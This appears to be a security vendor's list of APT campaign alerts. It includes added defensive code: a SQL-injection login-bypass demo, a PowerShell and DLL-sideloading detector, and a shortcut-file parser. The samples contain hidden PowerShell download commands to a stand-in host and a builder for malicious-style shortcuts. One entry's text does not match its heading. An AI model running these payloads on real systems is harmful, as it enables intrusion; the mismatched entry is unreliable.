ALERTS APT



DATE

NAME

CATEGORY

SUBCATEGORY

INFO

1.11.24

Daggerfly targets Taiwanese entities with new CloudScout Toolset

ALERTS

APT

China-linked threat actor Daggerfly (also known as Evasive Panda) has been reported targeting a government entity and a religious organization in Taiwan with a previously undocumented post-compromise toolset called CloudScout. The toolset retrieves data from various cloud services by reusing stolen web session cookies, and it integrates with MgBot, Evasive Panda's signature malware framework.

27.10.24

IcePeony: China-linked APT group targeting Southeast Asian governments

ALERTS

APT

A recently identified China-linked APT group dubbed IcePeony has been observed conducting malware campaigns against government agencies and institutions in countries such as India, Mauritius, and Vietnam. The group's initial access typically relies on SQL injection; from there it deploys web shells and backdoors, including the custom "IceCache" malware, to move deeper into compromised networks.
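The IcePeony entry names SQL injection as the foothold that precedes the web shells. The example below is added here to show the defect class in its smallest form and is not code from the alert or from any IcePeony tooling: a login query built by string formatting next to the parameterized version, run against a constructed in-memory SQLite table so the bypass can be reproduced offline. The table contents, the application and the payload are all made up for the example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for a web application's backend.
    The rows are made up for this example and are not taken from any reported incident."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT, role TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", "S3cret!", "admin"), ("clerk", "letmein", "user")],
    )
    return con


def login_vulnerable(con: sqlite3.Connection, username: str, password: str):
    """Builds the query by string formatting, so user input becomes SQL syntax.

    This is the defect class behind an initial SQL-injection foothold: once a query
    like this exists, the attacker controls the WHERE clause (and, on engines that
    allow stacked queries or file writes, considerably more than that).
    """
    sql = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return con.execute(sql).fetchone()


def login_safe(con: sqlite3.Connection, username: str, password: str):
    """Parameterized query: values are bound by the driver and never parsed as SQL."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone()


def demo() -> dict:
    """Runs the same injection payload against both versions and returns the outcomes."""
    con = make_db()
    # The leading quote closes the string literal, OR adds an attacker-chosen
    # condition, and "-- " comments out the password check that follows it.
    payload = "' OR role = 'admin' -- "
    return {
        "vulnerable": login_vulnerable(con, payload, "wrong-password"),
        "safe": login_safe(con, payload, "wrong-password"),
        "legit": login_safe(con, "clerk", "letmein"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:10s} -> {result}")
```

The vulnerable variant authenticates the attacker as admin with a wrong password; the parameterized variant returns no row for the same input while still accepting a genuine login. Parameterization is the fix, not input filtering: the comment sequence and quote used here are only one of many ways to reshape a string-built query.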

27.10.24

Leafperforator APT group expands operations into the Middle East and Africa

ALERTS

APT

Researchers recently published a warning about the Telegram account '@reserveplusbot', linked to a specific application and serving as a contact for technical support. The suspicious messages urged users to install a ZIP file that contains malware. The executable file inside is a variant of Meduza Stealer, which steals files and evades detection by modifying Microsoft Defender settings.

27.10.24

Threat actors associated with North Korea target tech job seekers with malware

ALERTS

APT

The Contagious Interview campaign, active since 2023, is run by threat actors associated with North Korea. Recent activity tied to this campaign shows the actors posing as job recruiters and luring victims into supposed interviews, using newer variants of previously seen malware against individuals seeking jobs in the tech industry. The BeaverTail downloader and stealer retrieves the final InvisibleFerret backdoor payload. Palo Alto Networks Unit 42 published a report with technical details of this activity.

27.10.24

VeilShell: A new threat from North Korea's Vedalia APT group

ALERTS

APT

According to reports, threat actors linked to North Korea have been deploying a previously undocumented backdoor and remote access trojan (RAT) called VeilShell in a campaign targeting Southeast Asian countries. The activity is attributed to the Vedalia APT group (aka APT37, ScarCruft, Reaper).

27.10.24

CeranaKeeper APT Campaign

ALERTS

APT

A recent CeranaKeeper APT campaign was observed by researchers. This China-linked threat actor targets government entities in Thailand, Myanmar, the Philippines, Japan, and Taiwan. The group continuously updates its tools, such as its backdoors, to evade detection, and abuses cloud services such as Dropbox and OneDrive in its custom tooling. It also leverages GitHub features to build a covert reverse shell, using the platform as its command-and-control (C2) channel.

28.9.24

Louse APT Group launches malware campaign targeting Chinese entities

ALERTS

APT

The Louse APT group (also known as Patchwork and Dropping Elephant) has reportedly launched a malware campaign targeting Chinese entities. The attack vector is a malicious LNK file, likely delivered by a phishing email. The shortcut executes a PowerShell script that downloads a decoy PDF and a malicious DLL; the DLL is then loaded by a legitimate executable through DLL sideloading.
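The Louse entry describes a three-step chain (shortcut, hidden PowerShell downloader, DLL sideloaded by a legitimate executable) that is visible in ordinary endpoint telemetry. The detection logic below is an added example, not code from the alert or from any vendor product: it runs over constructed Sysmon-style process-creation and image-load records, flags PowerShell launchers with hidden-window, bypass or download arguments, then flags unsigned DLLs loaded from the same directory as a non-system executable and raises severity when that executable was spawned by a flagged launcher. The event fields, paths, DLL name list and the example.invalid URLs are all assumptions made for the example.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed Sysmon-style telemetry (event ID 1 = process create, 7 = image load).
# These records are made up for the example and do not come from any real host.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 4120, "ppid": 1532, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    # The LNK's target: PowerShell with a hidden window, fetching a decoy PDF and a DLL
    {"id": 1, "pid": 5004, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -w hidden -ep bypass -c "iwr http://example.invalid/brief.pdf '
                r'-o $env:TEMP\upd\brief.pdf; iwr http://example.invalid/version.dll -o $env:TEMP\upd\version.dll"'},
    # PowerShell then starts a signed vendor binary dropped next to the DLL
    {"id": 1, "pid": 5080, "ppid": 5004,
     "image": r"C:\Users\u\AppData\Local\Temp\upd\viewer.exe", "cmdline": "viewer.exe"},
    {"id": 7, "pid": 5080, "image": r"C:\Users\u\AppData\Local\Temp\upd\viewer.exe",
     "loaded": r"C:\Users\u\AppData\Local\Temp\upd\version.dll", "signed": False},
    {"id": 7, "pid": 5080, "image": r"C:\Users\u\AppData\Local\Temp\upd\viewer.exe",
     "loaded": r"C:\Windows\System32\kernel32.dll", "signed": True},
    # Benign: a signed application loading its own signed helper DLL
    {"id": 7, "pid": 900, "image": r"C:\Program Files\Vendor\app.exe",
     "loaded": r"C:\Program Files\Vendor\helper.dll", "signed": True},
]

# Launcher patterns typical of LNK-to-PowerShell stagers (hidden window, policy
# bypass, encoded command, web download). Extend the list for your environment.
SUSPICIOUS_PS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-e(?:p|xecutionpolicy)\s+bypass|-enc\w*\s|"
    r"\biwr\b|invoke-webrequest|downloadfile|downloadstring",
    re.IGNORECASE,
)
# DLL names that applications normally resolve from System32; an unsigned copy of
# one of these sitting beside an EXE is the classic sideloading layout (assumed list).
COMMONLY_SIDELOADED = {"version.dll", "msimg32.dll", "dbghelp.dll", "wtsapi32.dll", "cryptbase.dll"}
SYSTEM_PREFIXES = ("c:\\windows\\",)


def _name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _dir(path: str) -> str:
    return str(PureWindowsPath(path).parent).lower()


def detect(events: list[dict]) -> list[dict]:
    """Two-stage detection: flag suspicious PowerShell launchers, then flag unsigned
    same-directory DLL loads, raising severity when the loading process descends
    from a flagged launcher (the chain the Louse alert describes)."""
    findings = []
    launchers = set()
    children = defaultdict(set)
    for e in events:
        if e["id"] != 1:
            continue
        children[e["ppid"]].add(e["pid"])
        if _name(e["image"]) in {"powershell.exe", "pwsh.exe"} and SUSPICIOUS_PS.search(e["cmdline"]):
            launchers.add(e["pid"])
            findings.append({"rule": "hidden_powershell_download", "pid": e["pid"], "severity": "medium"})

    for e in events:
        if e["id"] != 7:
            continue
        img_dir, dll_dir = _dir(e["image"]), _dir(e["loaded"])
        if e["signed"] or img_dir != dll_dir or img_dir.startswith(SYSTEM_PREFIXES):
            continue
        dll = _name(e["loaded"])
        spawned_by_launcher = any(e["pid"] in children[p] for p in launchers)
        severity = "high" if spawned_by_launcher or dll in COMMONLY_SIDELOADED else "medium"
        findings.append({"rule": "dll_sideload_candidate", "pid": e["pid"], "dll": dll,
                         "directory": img_dir, "severity": severity})
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The same-directory test is what separates sideloading from ordinary DLL use: the signed vendor application loading its own signed helper produces nothing, while the unsigned version.dll next to a binary started by a hidden PowerShell session is reported at high severity. In production the signature check should come from the image-load event's signature fields rather than a boolean, and the launcher list should be correlated by process GUID rather than PID to survive PID reuse.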

20.9.24

North Korean APT group Appleworm delivers PondRAT via poisoned Python packages

ALERTS

APT

An ongoing campaign involving poisoned Python packages delivering backdoors for Linux and macOS, dubbed PondRAT, has been reported. This campaign is believed to be driven by the North Korean APT group Appleworm (also known as AppleJeus, Citrine Sleet, Gleaming Pisces).

17.9.24

Fireant (Mustang Panda) unveils new tools in recent campaign against Asia-Pacific government entities

ALERTS

APT

The China-linked threat actor known as Fireant (also referred to as Mustang Panda) has recently been observed using new tools, including PUBLOAD, FDMTP, and PTSOCKET, in espionage attacks targeting government entities in the Asia-Pacific region.

13.9.24

VSCode abused by Chinese APT group

ALERTS

APT

Stately Taurus, a Chinese APT group that conducts cyber-espionage attacks, has abused Visual Studio Code in espionage operations targeting government entities in Southeast Asia. The threat actor used VSCode's embedded reverse shell feature to gain a foothold in target networks, execute arbitrary code and deliver additional payloads. They leveraged this mechanism to deliver malware, perform reconnaissance, and exfiltrate sensitive data.

6.9.24

Tropic Trooper unleashes new China Chopper variant and Crowdoor loader

ALERTS

APT

Tropic Trooper, a Chinese-speaking APT group, has been reported targeting Middle Eastern government entities in a cyber espionage campaign. The attackers focused on systems related to human rights studies, using a new China Chopper variant deployed on a compromised Umbraco CMS server. The group employed DLL hijacking to load malicious payloads, including Crowdoor, a loader linked to the SparrowDoor backdoor.

20.8.24

Threat actor Damselfly conducts campaigns against the U.S. and Israel

ALERTS

APT

Damselfly (aka APT42, Charming Kitten) is a well-established Iran-based threat actor. The group has routinely attacked high-value targets in both the U.S. and Israel. The main goal of these attacks is to steal credentials from entities such as NGOs and academic, government, and defense/military organizations to further Iran's military and political interests. Observed credential phishing campaigns use socially engineered lures and leverage links, fake sites and publicly available services such as Dropbox, OneDrive, and those offered by Google.

3.8.24

Grayfly (aka APT41) threat group deploying ShadowPad and Cobalt Strike in recent attacks

ALERTS

APT

As reported by researchers from Cisco Talos, the Grayfly threat group (also known as APT41) has been deploying ShadowPad malware and Cobalt Strike beacons in a recent distribution campaign observed in Taiwan. The attackers were reported to abuse an old, vulnerable version of the Microsoft Office IME executable (imecmnt.exe) as a second-stage loader for payload execution.

2.8.24

DoNot APT Targeting Pakistani Android Mobile Users

ALERTS

APT

APT-C-35 (aka DoNot APT Group) has been active in conducting cyberattacks since at least 2013. Recently, they have targeted Pakistani Android mobile users. Their attacks typically start with phishing campaigns, leading to the deployment of Android malware known as StealJob. The primary objective of these threat actors is to access confidential information and intellectual property. Their techniques include encryption and fileless malware to evade detection.

27.7.24

Continuous espionage activities attributed to the Stonefly APT

ALERTS

APT

Symantec Security Response is aware of the recent joint alert from CISA, FBI and several other partners concerning a number of recent targeted activities attributed to the Stonefly APT group (also known as Andariel or DarkSeoul).

24.7.24

Grayfly is targeting and compromising multiple sectors

ALERTS

APT

Over the past few weeks, multiple campaigns have been reported, carried out by the China-linked APT group Grayfly, also known as APT41.

19.7.24

APT17 Campaign: New variants of 9002 RAT targeting Italian government entities

ALERTS

APT

A malware campaign by the APT17 group has been reported, distributing newer variants of the 9002 RAT. The campaign specifically targets Italian government entities and companies. Users are lured with a link to a lookalike Italian government domain, purportedly to download a Skype installer.

12.7.24

OilAlpha targets Arabic-speaking humanitarian NGOs in Yemen

ALERTS

APT

OilAlpha continues to target Arabic-speaking entities, as well as those interested in humanitarian organizations and NGOs operating in Yemen. According to reports, users are lured to a deceptive web portal that mimics the generic login interfaces of humanitarian organizations such as CARE International and the Norwegian Refugee Council, with the aim of stealing credentials.

9.7.24

Popular sticky-note installers trojanized to push malware

ALERTS

 

A recent report by Cyber Threat Alliance (CTA) member Rapid7 disclosed that installers for the popular sticky-note app 'Notezilla' have been trojanized in order to deliver malware.

2.7.24

Datebug APT continues to spread CapraRAT Android malware

ALERTS

APT

Renewed malicious activity associated with the Datebug APT (aka Transparent Tribe or APT36) has been reported by researchers from SentinelOne. The threat actors continue to distribute Android malware known as CapraRAT via malicious Android .apk packages that mimic the appearance of legitimate apps. While the Datebug group has been known to target individuals within the military and government sectors in India, this updated campaign uses new lures and attempts to expand its reach to users interested in mobile gaming, TikTok videos or weapons.

12.6.24

Fireant APT targets Vietnamese entities with LNK file malware campaign

ALERTS

APT

A malware campaign conducted by the Fireant (also known as Mustang Panda) APT group using Windows shortcut (LNK) files has been reported. The threat actor targets Vietnamese entities with lures related to the education sector and tax compliance. The attack vector involves phishing emails with archive (zip, rar) attachments containing malicious LNK files. The final payload is believed to be the PlugX RAT, which helps the attackers to remotely execute various commands on the compromised system.

8.6.24

Sticky Werewolf APT

ALERTS

APT

Sticky Werewolf is a threat group initially discovered over a year ago. The attackers have been known to target various organizations, most recently the pharmaceutical and aviation sectors. In their attacks the threat actors leverage malicious .lnk files disguised as .docx documents, decoy .pdf files, malicious Batch and AutoIT scripts, among others. The final payloads distributed in campaigns by Sticky Werewolf include various RAT variants and infostealers. Some examples of malware families spread in previous attacks are Rhadamanthys Stealer, Ozone RAT, MetaStealer, DarkTrack and NetWire.

8.6.24

UNC1151 APT targets the Ukrainian Ministry of Defence with malicious Excel campaign

ALERTS

APT

The UNC1151 APT group, known for targeting Eastern European countries, has been observed conducting a malware campaign against the Ukrainian Ministry of Defence that uses a malicious Excel document as a lure. When opened, the document's embedded VBA macro drops an LNK file and a DLL loader. Running the LNK file starts the DLL loader, which is suspected to lead to final payloads including AgentTesla, Cobalt Strike beacons, and njRAT.

30.5.24

Datebug updating toolkits with Golang to be cross-platform

ALERTS

APT

APT group Datebug, in operation since 2013, has been observed updating their toolkit with a new data exfiltration tool written in Golang created with the goal of targeting APAC governments and defense sectors. The group utilizes phishing emails to lure recipients into opening an attached or linked malicious ZIP or ISO file which leads to the data exfiltration tool being installed.

30.5.24

Emergence of a new North Korean threat actor dubbed Moonstone Sleet

ALERTS

APT

A recent emergence in the threat landscape involves a new North Korean actor dubbed Moonstone Sleet. This actor has been detected engaging in various deceptive tactics, including the establishment of fake companies and job listings to lure potential targets. Additionally, they have been distributing trojanized versions of legitimate software tools, developing malicious games, and introducing a novel custom ransomware named FakePenny, comprising a loader and an encrypter. Their targets span individuals and organizations across sectors such as software and information technology, education, and defense industrial base.

25.5.24

Operation Diplomatic Specter: A Chinese APT campaign targeting political entities in multiple regions

ALERTS

APT

An ongoing campaign dubbed Operation Diplomatic Specter, targeting political entities in the Middle East, Africa, and Asia, has been reported. A Chinese APT group behind the campaign has been leveraging rare email exfiltration techniques against compromised servers.

23.5.24

Expanded operations of the Sharp Dragon APT

ALERTS

APT

As reported by Check Point, the Sharp Dragon APT group (formerly known as Sharp Panda) has been expanding its operations towards targets in Africa and the Caribbean. Sharp Dragon is known to use large-scale phishing attacks, malicious RTF files and DLL loaders, and most recently also executable loaders disguised as documents. The threat group has also been reported to leverage CVE-2023-0669, an RCE vulnerability affecting Fortra GoAnywhere, in its attacks.

21.5.24

Springtail threat group uses new Linux backdoor in attacks

ALERTS

APT

In a newly released report, Symantec's Threat Hunter Team sheds light on a recently discovered Linux backdoor developed by the North Korean Springtail espionage group (aka Kimsuky). The backdoor is linked to malware used in a recent campaign against organizations in South Korea, which leveraged trojanized software installation packages to deliver it.

3.5.24

NiceCurl and TameCat custom backdoors leveraged by Damselfly APT

ALERTS

APT

NiceCurl and TameCat are two custom backdoor variants recently leveraged in malicious campaigns attributed to the Damselfly APT (also known as APT42). These backdoors are reported to be delivered mostly by spear-phishing campaigns and used by the threat actors for the purpose of initial access to the targeted environments. While NiceCurl is a VBScript-based malware with capabilities to download and execute additional modules, TameCat backdoor is used to execute PowerShell and C# scripts as well as download additional arbitrary content.

25.4.24

SSLoad and Cobalt Strike leveraged in compromised "Contact Form" campaign

ALERTS

APT

A new loader called SSLoad has emerged; it is distinct from SLoad. Reports describe a campaign in which attackers submitted malicious links through websites' contact forms. Clicking these links downloads and installs the SSLoad malware, a DLL-based loader that then deploys further backdoors and payloads, including a Cobalt Strike beacon that connects to the attacker's C2 servers and exfiltrates system and user information.

25.4.24

SpyNote campaign using Vietnam's National Public Service as bait

ALERTS

APT

SpyNote remote access trojan and its variants are proliferating globally, with groups and individuals employing various social engineering tactics to target mobile users. In a recent campaign, Symantec observed the threat (DỊCH VỤ CÔNG.apk) masquerading as an official app from Vietnam's National Public Service web platform, which offers extensive online public services for both citizens and businesses.

25.4.24

APT43 exploits Dropbox in TutorialRAT distribution campaign

ALERTS

APT

The APT43 group has been observed distributing TutorialRAT while abusing Dropbox cloud storage as a base for its attacks to evade threat monitoring. This campaign appears to be an extension of APT43's BabyShark campaign and employs typical spear-phishing techniques, including the use of shortcut (LNK) files. TutorialRAT is a C#-based remote access tool that functions as an infostealer, collecting and exfiltrating device and user personal information.
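Several entries on this page (Fireant's LNK campaign against Vietnamese entities, Sticky Werewolf's .lnk files disguised as .docx documents, the UNC1151 macro that drops an LNK, and APT43's TutorialRAT delivery above) turn on a Windows shortcut whose real target is hidden from the user. The parser below is an added example, not code from any of the alerts or from the vendors cited: it walks the Shell Link (MS-SHLLINK) header, skips the optional IDList and LinkInfo structures, and reads the StringData fields to recover the target, arguments, working directory and icon, then applies a few heuristics for the lure pattern (an interpreter as target, a minimized window, suspicious arguments, a document viewer's icon on a shortcut that runs a shell). A minimal writer is included only so the sample shortcuts can be constructed offline; the sample paths, arguments and the example.invalid URL are assumptions made for the example.

```python
import struct
from pathlib import PureWindowsPath

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
# LinkFlags bits from the MS-SHLLINK specification
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the console window out of sight

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "rundll32.exe",
                "wscript.exe", "cscript.exe", "certutil.exe", "regsvr32.exe"}


def parse_lnk(data: bytes) -> dict:
    """Walks the Shell Link header, the optional IDList/LinkInfo blocks, and the
    StringData section to recover what the shortcut actually runs."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show = struct.unpack_from("<I", data, 60)[0]
    pos = 76
    if flags & HAS_ID_LIST:        # IDListSize (2 bytes) followed by the item list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:      # LinkInfoSize (4 bytes) counts the whole structure
        pos += struct.unpack_from("<I", data, pos)[0]
    info = {"show_command": show, "flags": flags}
    for key, bit in (("name", HAS_NAME), ("relative_path", HAS_REL_PATH), ("working_dir", HAS_WORKING_DIR),
                     ("arguments", HAS_ARGS), ("icon_location", HAS_ICON)):
        if not flags & bit:
            info[key] = ""
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, not bytes
        pos += 2
        if flags & IS_UNICODE:
            info[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            info[key] = data[pos:pos + count].decode("cp1252")
            pos += count
    return info


def assess(info: dict) -> list[str]:
    """Heuristics for the delivery pattern in the alerts: interpreter as target,
    hidden window, stager-style arguments, and a borrowed document-viewer icon."""
    reasons = []
    target = PureWindowsPath(info["relative_path"]).name.lower()
    if target in INTERPRETERS:
        reasons.append(f"target_is_interpreter:{target}")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("hidden_window")
    args = info["arguments"].lower()
    if any(tok in args for tok in ("-w hidden", "-windowstyle hidden", "-enc", "bypass", "iwr", "downloadstring")):
        reasons.append("suspicious_arguments")
    icon = PureWindowsPath(info["icon_location"]).name.lower()
    if icon in {"winword.exe", "excel.exe", "acrord32.exe"} and target in INTERPRETERS:
        reasons.append("document_icon_masquerade")
    return reasons


def build_lnk(relative_path: str, arguments: str = "", working_dir: str = "",
              icon_location: str = "", show_command: int = 1) -> bytes:
    """Minimal LNK writer (no IDList/LinkInfo) used only to produce test inputs offline."""
    flags = HAS_REL_PATH | IS_UNICODE
    flags |= HAS_ARGS if arguments else 0
    flags |= HAS_WORKING_DIR if working_dir else 0
    flags |= HAS_ICON if icon_location else 0
    # HeaderSize, CLSID, LinkFlags, FileAttributes, 3 FILETIMEs, FileSize, IconIndex,
    # ShowCommand, HotKey, Reserved1..3 = 76 bytes
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20, 0, 0, 0, 0, 0,
                         show_command, 0, 0, 0, 0)

    def field(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    body = field(relative_path)                       # StringData order is fixed by the spec
    body += field(working_dir) if working_dir else b""
    body += field(arguments) if arguments else b""
    body += field(icon_location) if icon_location else b""
    return header + body


# Constructed sample: a "document" shortcut that really launches a hidden PowerShell stager
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r'-w hidden -ep bypass -c "iwr http://example.invalid/decoy.pdf -o $env:TEMP\d.pdf; start $env:TEMP\d.pdf"',
    working_dir=r"%TEMP%",
    icon_location=r"C:\Program Files\Adobe\Acrobat Reader\AcroRd32.exe",
    show_command=SW_SHOWMINNOACTIVE,
)
BENIGN_LNK = build_lnk(r"..\..\Program Files\Vendor\app.exe", show_command=1)

if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE_LNK), ("benign", BENIGN_LNK)):
        parsed = parse_lnk(blob)
        print(label, parsed["relative_path"], parsed["arguments"], assess(parsed))
```

Real shortcuts produced by Windows usually carry an IDList and a LinkInfo block, which the parser skips by size, and may store strings in the ANSI code page rather than UTF-16; the writer here omits those blocks deliberately to keep the sample small. To triage an attachment, read the .lnk bytes from disk and pass them to parse_lnk followed by assess.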

22.4.24

Core Werewolf APT group targets Russian defense organizations in espionage campaign

ALERTS

APT

Espionage activity of the Core Werewolf APT group targeting Russian defense organizations was observed around mid-April. The attack utilized a malicious document as bait, purportedly meant for the presentation of state awards to special forces soldiers. However, the document is actually a 7zSFX archive containing a legitimate remote access tool, UltraVNC. Upon extraction, the malware creates copies of a decoy document and the UltraVNC executable, schedules tasks to run the executable, and establishes a connection to a designated server.

20.4.24

Coreid (aka Fin7) uses backdoor against US Automaker victims

ALERTS

APT

A recent report provided details of activity by the Coreid (aka Fin7) threat group in which victims in the US automaker industry were targeted. According to the report, the campaign leveraged spearphishing emails against selected targets by socially engineering content related to free online scanning tools. The victim would be coerced into following a link to a typosquatted domain related to a legitimate online scanner.

20.4.24

APT Group exploits Web3 gaming hype in campaign for cryptocurrency earnings

ALERTS

APT

A campaign centered around imitating web3 gaming projects has been observed, likely operated by a Russian-language APT group aiming for potential cryptocurrency earnings by leveraging the allure of blockchain-based gaming. Users are enticed to visit the main webpages of these projects to download the software. Once installed, the software further infects devices with infostealer malware. Depending on the operating system, the malware variants include Atomic macOS Stealer (AMOS), Stealc, Rhadamanthys, or RisePro.

8.4.24

African based telecommunications organizations targeted by Iranian Seedworm group

ALERTS

APT

The Symantec Threat Hunter Team, part of Broadcom, observed a recent campaign by the Seedworm threat actor group, targeting telecommunications organizations in North and East Africa. This activity, which occurred in November 2023, leveraged some new and some existing features previously attributed to Seedworm.

27.3.24

Stately Taurus APT Campaign Targeting Asian Countries

ALERTS

APT

Researchers observed a recent Stately Taurus (aka Mustang Panda) APT campaign targeting Asian countries during the ASEAN-Australia Special Summit held this month. Two malware packages were created and deployed for this attack, one in ZIP format and the other a SCR file. Both packages aim to deploy malware by abusing copies of applications from known software developers such as QFX Software Corporation and Electronic Arts, Inc.